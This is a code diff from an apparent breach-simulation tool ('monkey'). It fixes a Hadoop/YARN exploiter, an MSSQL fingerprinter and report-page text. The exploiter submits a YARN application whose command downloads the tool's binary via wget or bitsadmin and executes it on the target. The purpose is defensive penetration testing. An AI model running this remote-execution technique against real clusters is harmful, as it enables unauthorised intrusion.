forked from p34709852/monkey
Fixed reporting and uploading bugs
parent 5674bebfa6
commit c7952dcbc5
@@ -12,7 +12,7 @@ from exploit.web_rce import WebRCE
 from tools import get_target_monkey, HTTPTools, build_monkey_commandline, get_monkey_depth
 import posixpath
 from threading import Lock
-from model import DROPPER_ARG
+from model import DROPPER_ARG, DOWNLOAD_TIMEOUT
 
 __author__ = 'VakarisZ'
 
@@ -20,13 +20,17 @@ LOG = logging.getLogger(__name__)
 
 class HadoopExploiter(WebRCE):
     _TARGET_OS_TYPE = ['linux', 'windows']
-    HADOOP_PORTS = ["8088"]
-    LINUX_COMMAND = "wget -O %(monkey_path)s %(http_path)s " \
-                    "&& chmod +x %(monkey_path)s " \
+    # TODO add more hadoop ports
+    HADOOP_PORTS = [["8088", False]]
+    # We need to prevent from downloading if monkey already exists because hadoop uses multiple threads/nodes
+    # to download monkey at the same time
+    LINUX_COMMAND = "! [ -f %(monkey_path)s ] " \
+                    "&& wget -O %(monkey_path)s %(http_path)s " \
+                    "; chmod +x %(monkey_path)s " \
                     "&& %(monkey_path)s %(monkey_type)s %(parameters)s"
     WINDOWS_COMMAND = "bitsadmin /transfer Update /download /priority high %(http_path)s %(monkey_path)s " \
                       "&& %(monkey_path)s %(monkey_type)s %(parameters)s"
 
     LOCK = Lock()
 
     def __init__(self, host):
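Aside (not part of the commit): LINUX_COMMAND and WINDOWS_COMMAND are plain %-format templates. A minimal sketch of how the new Linux command renders; every value below is a hypothetical stand-in for what get_monkey_dest_path, HTTPTools and DROPPER_ARG would supply at run time.

# Illustrative only -- all values are assumed, not taken from the commit.
LINUX_COMMAND = "! [ -f %(monkey_path)s ] " \
                "&& wget -O %(monkey_path)s %(http_path)s " \
                "; chmod +x %(monkey_path)s " \
                "&& %(monkey_path)s %(monkey_type)s %(parameters)s"

print(LINUX_COMMAND % {"monkey_path": "/tmp/monkey",                      # assumed destination path on the victim
                       "http_path": "http://10.0.0.1:8080/monkey-linux",  # assumed URL of the attacker's HTTP server
                       "monkey_type": "dropper",                          # stand-in for DROPPER_ARG
                       "parameters": "-d 1"})                             # stand-in for the built monkey command line
# -> ! [ -f /tmp/monkey ] && wget -O /tmp/monkey http://10.0.0.1:8080/monkey-linux ; chmod +x /tmp/monkey && /tmp/monkey dropper -d 1
# The leading "! [ -f ... ] && wget" downloads only when the file is missing (several YARN
# containers may run the same command at once), while ";" lets chmod and execution run either way.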
@@ -47,25 +51,33 @@ class HadoopExploiter(WebRCE):
         if not src_path:
             LOG.info("Can't find suitable monkey executable for host %r", self.host)
             return False
-        # Determine which destination path to use
+        # Determine where to save monkey on the target
         LOG.debug("Monkey path found")
         path = WebRCE.get_monkey_dest_path(self._config, src_path)
-        # Build command to execute
-        monkey_cmd = build_monkey_commandline(self.host, get_monkey_depth() - 1, path)
-        if 'linux' in self.host.os['type']:
-            command = self.LINUX_COMMAND % {"monkey_path": path, "http_path": src_path,
-                                            "monkey_type": DROPPER_ARG, "parameters": monkey_cmd}
-        else:
-            command = self.WINDOWS_COMMAND % {"monkey_path": path, "http_path": src_path,
-                                              "monkey_type": DROPPER_ARG, "parameters": monkey_cmd}
         if not path:
             return False
         # To avoid race conditions we pass a locked lock to http servers thread
         self.LOCK.acquire()
         # Create server for http download and wait for it's startup.
         http_path, http_thread = HTTPTools.create_locked_transfer(self.host, src_path, self.LOCK)
         self.LOCK.acquire()
-        self.exploit(url, command)
+
+        # Build command to execute
+        monkey_cmd = build_monkey_commandline(self.host, get_monkey_depth() - 1, path)
+        if 'linux' in self.host.os['type']:
+            command = self.LINUX_COMMAND % {"monkey_path": path, "http_path": http_path,
+                                            "monkey_type": DROPPER_ARG, "parameters": monkey_cmd}
+        else:
+            command = self.WINDOWS_COMMAND % {"monkey_path": path, "http_path": http_path,
+                                              "monkey_type": DROPPER_ARG, "parameters": monkey_cmd}
+        # command = "! [ -f %(monkey_path)s ] wget -O %(monkey_path)s %(http_path)s" % {"monkey_path": path, "http_path": http_path}
+        if not path:
+            return False
+
+        if not self.exploit(url, command):
+            return False
+        self.LOCK.release()
+        http_thread.join(DOWNLOAD_TIMEOUT)
+        http_thread.stop()
         return True
 
     def exploit(self, url, command):
         # Get the newly created application id
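Aside (not part of the commit): the double acquire around HTTPTools.create_locked_transfer is a "locked lock" hand-off. The helper's internals are not shown in this diff, so the sketch below only illustrates the coordination pattern implied by the comments: the second acquire blocks until the server thread releases the lock to signal it has started.

# Sketch of the lock hand-off; the server internals are assumed, only the
# acquire/acquire/release ordering mirrors the code above.
from threading import Lock, Thread
import time

lock = Lock()

def locked_transfer(lock):
    time.sleep(0.5)   # stand-in for starting the HTTP server and serving the file
    lock.release()    # signal the waiting caller that this side is ready

lock.acquire()                                  # 1st acquire: start out holding the lock
thread = Thread(target=locked_transfer, args=(lock,))
thread.start()
lock.acquire()                                  # 2nd acquire: blocks until the thread releases
# ... run the command that downloads from the server here ...
lock.release()                                  # matches self.LOCK.release() in the new code
thread.join(timeout=5)                          # analogous to http_thread.join(DOWNLOAD_TIMEOUT)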
@@ -85,10 +97,17 @@ class HadoopExploiter(WebRCE):
             "application-type": "YARN"
         }
         resp = requests.post(posixpath.join(url, "ws/v1/cluster/apps/"), json=payload)
         if resp.status_code == 202:
             return True
         else:
             return False
 
     def try_exploit(self, url):
         # Get the newly created application id
-        resp = requests.post(posixpath.join(url, "ws/v1/cluster/apps/new-application"))
+        try:
+            resp = requests.post(posixpath.join(url, "ws/v1/cluster/apps/new-application"))
+        except requests.ConnectionError:
+            return False
         if resp.status_code == 200:
             return True
         else:
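Aside (not part of the commit): the two endpoints above are the stock YARN ResourceManager REST API. A rough sketch of the request flow that try_exploit() and exploit() perform; the host and every payload field except "application-type" are assumptions, since the rest of the payload sits outside this hunk.

# Illustrative request flow; host/port and most payload fields are assumed.
import posixpath
import requests

url = "http://10.0.0.1:8088/"   # hypothetical YARN ResourceManager address

# try_exploit(): a 200 from new-application marks the URL as exploitable.
resp = requests.post(posixpath.join(url, "ws/v1/cluster/apps/new-application"))
app_id = resp.json()["application-id"]

# exploit(): submit an application whose container runs the attacker's command;
# YARN answers 202 Accepted when the submission is queued.
payload = {
    "application-id": app_id,
    "application-name": "get-shell",                       # assumed name
    "am-container-spec": {"commands": {"command": "id"}},  # harmless placeholder command
    "application-type": "YARN"
}
resp = requests.post(posixpath.join(url, "ws/v1/cluster/apps/"), json=payload)
print(resp.status_code == 202)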
@@ -29,7 +29,8 @@ class MSSQLFinger(HostFinger):
         Discovered server information written to the Host info struct.
         True if success, False otherwise.
         """
+        # TODO remove auto-return
+        return False
         assert isinstance(host, VictimHost)
 
         # Create a UDP socket and sets a timeout
@@ -332,7 +332,7 @@ class ReportPageComponent extends AuthComponent {
                 <li>Oracle WebLogic servers are vulnerable to remote code execution. (<a
                   href="https://nvd.nist.gov/vuln/detail/CVE-2017-10271">
                   CVE-2017-10271</a>)</li> : null }
-              {this.state.report.overview.issues[this.Issue.WEBLOGIC] ?
+              {this.state.report.overview.issues[this.Issue.HADOOP] ?
                 <li>Hadoop/Yarn servers are vulnerable to remote code execution.</li> : null }
             </ul>
           </div>
@@ -722,7 +722,7 @@ class ReportPageComponent extends AuthComponent {
   generateHadoopIssue(issue) {
     return (
       <li>
-        Run Hadoop in secure mode(<a href="http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html">
+        Run Hadoop in secure mode(<a href="http://hadoop.apache.org/docs/current/hadoop-project-dist/hadoop-common/SecureMode.html">
         add Kerberos authentication</a>).
         <CollapsibleWellComponent>
           Oracle WebLogic server at <span className="label label-primary">{issue.machine}</span> (<span